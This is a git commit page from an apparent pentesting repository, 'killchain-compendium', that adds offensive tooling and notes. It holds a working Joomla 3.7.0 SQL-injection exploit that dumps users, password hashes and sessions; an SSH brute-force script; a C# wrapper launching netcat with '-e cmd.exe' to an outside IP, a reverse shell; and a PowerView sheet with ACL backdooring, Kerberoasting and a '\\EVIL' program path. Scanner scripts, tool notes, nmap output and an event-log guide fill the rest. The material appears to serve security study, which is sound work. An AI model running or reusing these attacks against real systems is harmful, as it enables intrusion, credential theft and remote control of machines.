whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

second commit

This commit is contained in:
Stefan Friese 2021-08-23 01:13:54 +02:00
parent 7bb194b436
commit d4648a2f18
148 changed files with 9860 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
PayloadsAllTheThings Submodule

@ -0,0 +1 @@
Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631

1
PowerSploit Submodule

@ -0,0 +1 @@
Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f

207
active_directory/powerview.ps1 Normal file
View File

@ -0,0 +1,207 @@
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : find specific data entries in a data set
# Add : add a new object to a destination
# Set : modify a given object
# Invoke : lazy catch-all
# Nouns:
# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
# Verb-Net* : indicates that Win32 API access is being used under the hood
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>
# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
# retrieve all the computer dns host names a GPP password applies to
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
$Date = (Get-Date).AddYears(-1).ToFileTime()
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
# all enabled users, returning distinguishednames
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
# all disabled users
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
Get-DomainUser -UACFilter ACCOUNTDISABLE
# all users that require smart card authentication
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
# all users that *don't* require smart card authentication, only returning sam account names
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
# use multiple identity types for any *-Domain* function
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
# find all users with an SPN set (likely service accounts)
Get-DomainUser -SPN
# check for users who don't have kerberos preauthentication set
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
# find all service accounts in "Domain Admins"
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
# find users with sidHistory set
Get-DomainUser -LDAPFilter '(sidHistory=*)'
# find any users/computers with constrained delegation st
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
$Computers = Get-DomainComputer -Unconstrained
$Users = Get-DomainUser -AllowDelegation -AdminCount
# return the local *groups* of a remote server
Get-NetLocalGroup SERVER.domain.local
# return the local group *members* of a remote server using Win32 API methods (faster but less info)
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
# Kerberoast any users in a particular OU with SPNs set
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
# Find-DomainUserLocation == old Invoke-UserHunter
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
# find all computers in a given OU
Get-DomainComputer -SearchBase "ldap://OU=..."
# Get the logged on users for all machines in any *server* OU in a particular domain
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}
# enumerate all gobal catalogs in the forest
Get-ForestGlobalCatalog
# turn a list of computer short names to FQDNs, using a global catalog
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
# enumerate the current domain controller policy
$DCPolicy = Get-DomainPolicy -Policy DC
$DCPolicy.PrivilegeRights # user privilege rights on the dc...
# enumerate the current domain policy
$DomainPolicy = Get-DomainPolicy -Policy Domain
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
$DomainPolicy.SystemAccess # password age/etc.
# enumerate what machines that a particular user/group identity has local admin rights to
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
# enumerate what machines that a given user in the specified domain has RDP access rights to
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
# export a csv of all GPO mappings
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
# use alternate credentials for searching for files on the domain
# Find-InterestingDomainShareFile == old Invoke-FileFinder
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
# grant user 'will' the rights to change 'matt's password
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
# audit the permissions of AdminSDHolder, resolving GUIDs
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
# find linked DA accounts using name correlation
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}
# save a PowerView object to disk for later usage
Get-DomainUser | Export-Clixml user.xml
$Users = Import-Clixml user.xml
# Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
# find all policies applied to a current machine
Get-DomainGPO -ComputerIdentity windows1.testlab.local
# enumerate all groups in a domain that don't have a global scope, returning just group names
Get-DomainGroup -GroupScope NotGlobal -Properties name
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains = @{}
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
# extract the domain the foreign user was added to
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
# check if we've already enumerated this domain
if (-not $Domains[$ForeignUserDomain]) {
$Domains[$ForeignUserDomain] = $True
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
}
}
$ForeignMemberships | fl
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Invoke-UserImpersonation -Credential $Cred
# ... action
Invoke-RevertToSelf
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
# set the specified property for the given user identity
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
}
# check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

17
antivirus_evasion.md Normal file
View File

@ -0,0 +1,17 @@
# Antivirus Evasion
* Existing types
* On-Disk evasion
* In-Memory evasion
* Detection Methods
* Static Detection -- Hash or String/Byte Matching
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
## Links
* [cmnatic](https://cmnatic.co.uk/)
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)

1
enumeration/Checklists Submodule

@ -0,0 +1 @@
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60

BIN
enumeration/PSTools.zip Normal file
View File

Binary file not shown.

48
enumeration/docs/gobuster.md Normal file
View File

@ -0,0 +1,48 @@
# Gobuster
[Repo](https://github.com/OJ/gobuster.git)
### Directories
```sh
gobuster dir -u <URL> -w <wordlist>
```
### DNS
```sh
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
```
### Vhosts
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
```sh
gobuster vhost -u <URL> -w <wordlist>
```
### FileExtension
```sh
-x
```
* Fuzz for files and file extensions
```sh
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
```
### Basic Auth
```sh
gobuster help dir
```
* `--username` and `--password`
* `dir -s` Accept HTTP Status
* `dir -k` Skip TLS Auth
* `dir -a` User Agent
### Wordlists
```sh
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
```

17
enumeration/docs/nmap.md Normal file
View File

@ -0,0 +1,17 @@
# nmap
# Usage
```sh
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
```
```sh
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
```
## combo with searchsploit
* nmap-full scan
```sh
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
searchsploit --nmap ./nmap-full.xml --verbose
```

35
enumeration/docs/wpscan.md Normal file
View File

@ -0,0 +1,35 @@
# WPScan
## Themes
```sh
wpscan --url <URL> --enumerate t
```
* `ls` for content
## Plugins
```sh
wpscan --url <URL> --enumerate p
```
## Users
```sh
wpscan --url <URL> --enumerate u
```
## Vulnerabilities
* WPVulnDB API is needed
* Plugins
```sh
wpscan --url <URL> --enumerate vp
```
## Password attack
```sh
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
```
## WAF Aggressiveness
```sh
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>

1
enumeration/gobuster Submodule

@ -0,0 +1 @@
Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125

186
enumeration/joomblah.py Executable file
View File

@ -0,0 +1,186 @@
#!/usr/bin/python3
import requests
import sys
import re
import argparse
import os
import random
import time
import binascii
def extract_token(resp):
match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
if match is None:
print(" [!] Cannot find CSRF token")
return None
return match.group(1)
def parse_options():
parser = argparse.ArgumentParser(description='Jooma Exploit')
parser.add_argument('url', help='Base URL for Joomla site')
return parser.parse_args()
def build_sqli(colname, morequery):
return "(SELECT " + colname + " " + morequery + ")"
def joomla_370_sqli_extract(options, sess, token, colname, morequery):
sqli = build_sqli("LENGTH("+colname+")", morequery)
length = joomla_370_sqli(options, sess, token, sqli)
if not length:
return None
length = int(length)
maxbytes = 30
offset = 0
result = ''
while length > offset:
sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
value = joomla_370_sqli(options, sess, token, sqli)
if not value:
print(" [!] Failed to retrieve string for query:", sqli)
return None
value = binascii.unhexlify(value)
result += value
offset += len(value)
return result
def joomla_370_sqli(options, sess, token, sqli):
sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
data = {
'option': 'com_fields',
'view': 'fields',
'layout': 'modal',
'list[fullordering]': sqli_full,
token: '1',
}
resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
match = re.search(r'XPATH syntax error:\s*&#039;([^$\n]+)\s*&#039;\s*</bl', resp.text, re.S)
if match:
match = match.group(1).strip()
if match[0] != ':' and match[-1] != ':':
return None
return match[1:-1]
def extract_joomla_tables(options, sess, token):
tables = list()
first = False
offset = 0
while True:
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
if result is None:
if first:
print("[!] Failed to retrieve first table name!")
return False
break
tables.append(result)
print(" - Found table:", result)
first = False
offset += 1
return tables
def extract_joomla_users(options, sess, token, table_name):
users = list()
offset = 0
first = False
print(" - Extracting users from", table_name)
while True:
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
if result is None:
if first:
print("[!] Failed to retrieve user from table!")
return False
break
result = result.split('|')
print(" [$] Found user",result)
first = False
offset += 1
users.append(result)
return users
def extract_joomla_sessions(options, sess, token, table_name):
sessions = list()
offset = 0
first = False
print(" - Extracting sessions from", table_name)
while True:
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
if result is None:
if first:
print("[!] Failed to retrieve session from table!")
return False
break
result = result.split('|')
print(" [$] Found session", result)
first = False
offset += 1
sessions.append(result)
return sessions
def pwn_joomla_again(options):
sess = requests.Session()
print(" [-] Fetching CSRF token")
resp = sess.get(options.url + "/index.php/component/users/?view=login")
token = extract_token(resp)
if not token:
return False
# Verify that we can perform SQLi
print(" [-] Testing SQLi")
result = joomla_370_sqli(options, sess, token, "128+127")
if result != "255":
print(" [!] Could not find SQLi output!")
return False
tables = extract_joomla_tables(options, sess, token)
for table_name in tables:
table_prefix = table_name[:-5]
extract_joomla_users(options, sess, token, table_name)
extract_joomla_sessions(options, sess, token, table_prefix + 'session')
return True
def print_logo():
clear = "\x1b[0m"
colors = [31, 32, 33, 34, 35, 36]
logo = """
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/\'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
"""
for line in logo.split("\n"):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
#time.sleep(0.05)
def main(base_url):
options = parse_options()
options.url = options.url.rstrip('/')
print_logo()
pwn_joomla_again(options)
if __name__ == "__main__":
sys.exit(main("http://192.168.10.100:8080/joomla"))

1
enumeration/kerbrute Submodule

@ -0,0 +1 @@
Subproject commit 9cfb81e4fab8037acb44c678773ca3f93bc2b39c

16
enumeration/network_scanners/arp_enum.py Executable file
View File

@ -0,0 +1,16 @@
#!/usr/bin/env python
from scapy.all import *
interface = "wls3"
ip_range = "192.168.179.0/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
for send, receive in ans:
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

16
enumeration/network_scanners/dir_enum.py Executable file
View File

@ -0,0 +1,16 @@
#!/usr/bin/env python
import requests
import sys
sub_dirs = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
sub_dirs = _f.read().splitlines()
for dir in sub_dirs:
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
r = requests.get(dir_enum)
if r.status_code == 404:
pass
else:
print("Valid directory: ", dir_enum)

7
enumeration/network_scanners/file_downloader.py Executable file
View File

@ -0,0 +1,7 @@
#!/usr/bin/env python
import requests
url = "https://download.sysinternals.com/files/PSTools.zip"
r = requests.get(url, allow_redirects=True)
open("PSTools.zip", 'wb').write(r.content)

35
enumeration/network_scanners/port_enum.py Executable file
View File

@ -0,0 +1,35 @@
#!/usr/bin/env python
import sys
import socket
import pyfiglet
print(pyfiglet.figlet_format("Port Scanner"))
ip = sys.argv[1]
open_ports = []
ports = range(1,10000)
def probe_port(ip, port, result = 1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip,port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result
for port in ports:
sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)
if open_ports:
print("[+] Open Ports are: ")
print(sorted(open_ports))
else:
print("[-] No Open Ports")

22
enumeration/network_scanners/subdomain_enum.py Executable file
View File

@ -0,0 +1,22 @@
#!/usr/bin/env python
import requests
import sys
subdomains = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
subdomains = _f.read().splitlines()
for sub in subdomains:
http_domain = f"http://{sub}.{sys.argv[1]}"
try:
requests.get(http_domain)
except requests.ConnectionError:
pass
else:
print("Valid domain: ", http_domain)

32
enumeration/nikto/nikto.md Normal file
View File

@ -0,0 +1,32 @@
# Nikto
Scan web server vulnerabilities and more.
## mmap Input
* Pipe or pre run nmap
```sh
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
```
```sh
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
```
# Usage
* Example
```
nikto -h http://example.com i -p 80,8080
```
```sh
nikto -id <user>:<password> -h http://example.com:1234/manager/html
```
## Plugins
```sh
nikto -h http://example.com -Plugins apacheusers
```
* List all plugins
```sh
nikto -list-plugins
```

4
enumeration/nmap-full.gnmap Normal file
View File

@ -0,0 +1,4 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Host: 10.10.156.247 () Status: Up
Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp/////
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

19
enumeration/nmap-full.nmap Normal file
View File

@ -0,0 +1,19 @@
# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247
Nmap scan report for 10.10.156.247
Host is up (0.064s latency).
Not shown: 64293 closed ports, 1231 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
31337/tcp open Elite
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

35
enumeration/nmap-full.xml Normal file
View File

@ -0,0 +1,35 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247 -->
<nmaprun scanner="nmap" args="nmap -oA nmap-full -Pn -sS -T4 -p- -&#45;defeat-rst-ratelimit 10.10.156.247" start="1628704699" startstr="Wed Aug 11 19:58:19 2021" version="7.91" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1628704700" endtime="1628704723"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.10.156.247" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports><extraports state="closed" count="64293">
<extrareasons reason="resets" count="64293"/>
</extraports>
<extraports state="filtered" count="1231">
<extrareasons reason="no-responses" count="1231"/>
</extraports>
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="msrpc" method="table" conf="3"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="netbios-ssn" method="table" conf="3"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="microsoft-ds" method="table" conf="3"/></port>
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="ms-wbt-server" method="table" conf="3"/></port>
<port protocol="tcp" portid="31337"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="Elite" method="table" conf="3"/></port>
<port protocol="tcp" portid="49152"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49153"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49154"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49155"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49161"><state state="open" reason="syn-ack" reason_ttl="127"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="tcp" portid="49162"><state state="open" reason="syn-ack" reason_ttl="127"/></port>
</ports>
<times srtt="64161" rttvar="6610" to="100000"/>
</host>
<runstats><finished time="1628704723" timestr="Wed Aug 11 19:58:43 2021" summary="Nmap done at Wed Aug 11 19:58:43 2021; 1 IP address (1 host up) scanned in 23.92 seconds" elapsed="23.92" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

31
enumeration/shodan.md Normal file
View File

@ -0,0 +1,31 @@
# Shodan
## Checking found Autonomous System Number (ASN)
* Shodan does output ASN, not necessarily the IP of a small company. Search for
```h
asn:AS13335
```
* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
## Banner
* Example
```json
{
"data": "Moxa Nport Device",
"Status": "Authentication disabled",
"Name": "NP5232I_4728",
"MAC": "00:90:e8:47:10:2d",
"ip_str": "46.252.132.235",
"port": 4800,
"org": "Starhub Mobile",
"location": {
"country_code": "SG"
}
}
```
## Filter
* vulns
```sh
vuln:ms17-010
```

38
enumeration/ssh_brute_force.py Executable file
View File

@ -0,0 +1,38 @@
#!/usr/bin/env python
import paramiko
import sys
import os
target = str(input("IP address: "))
username = str(input("Username: "))
password_file = str(input("Location of password file: "))
def ssh_connect(password, code=0):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target, port=22, username=username, password=password)
except paramiko.AuthenticationException:
code = 1
ssh.close()
return code
with open(password_file, 'rb') as _f:
for line in _f.readlines():
password = line.strip()
print(password)
try:
response = ssh_connect(password)
if response == 0 :
print("[+] Password Found: " + password.decode())
exit(0)
if response == 1:
print("[-] Nothing Found")
except Exception as e:
print(e)
pass

1
enumeration/windows/Windows-Exploit-Suggester-python3 Submodule

@ -0,0 +1 @@
Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a

13
enumeration/windows/Wrapper.cs Normal file
View File

@ -0,0 +1,13 @@
using System;
using System.Diagnostics;
namespace Wrapper {
class Program {
static void Main (){
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
proc.StartInfo = procInfo;
proc.Start();
}
}
}

93
enumeration/windows/event_log.md Normal file
View File

@ -0,0 +1,93 @@
# Logging
* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
## Loglevel
|ID|Event Type|Description|
|--|----------|-----------|
|0|Error|An event that indicates a significant problem.|
|1|Warning|An event that is not necessarily significant.|
|2|Information|An event describing the successful operation of an application.|
|3|Success Audit|An event that records an audited security access attempt that is successful.|
|4|Failure Audit|An event that records an audited security access attempt that is failure.|
## Logrotation
```sh
C:\Windows\System32\winevt\Logs
```
* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
## Tools
* Event Viewer (GUI-based application)
* Wevtutil.exe (command-line tool)
* Get-WinEvent (PowerShell cmdlet)
### wevtutil.exe
```sh
wevtutil.exe /?
```
* Count logs
```sh
wevtutil.exe le | measure
```
* Read three most recent Application logs
```sh
wevtutil qe Application /c:3 /rd:true /f:text
```
### Get-WinEvent
* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
* List all the logs
```sh
Get-WinEvent -ListLog *
```
* Find string
```sh
Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
```
* Further filtering
```sh
Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
```
```sh
Get-WinEvent -ListProvider *Policy*
```
```sh
(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
```
* Filter by hashtable values
```sh
Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
```
```sh
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
```
* Including __XPATH__
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
```
```sh
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
```
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
```
* Find login by username
```sh
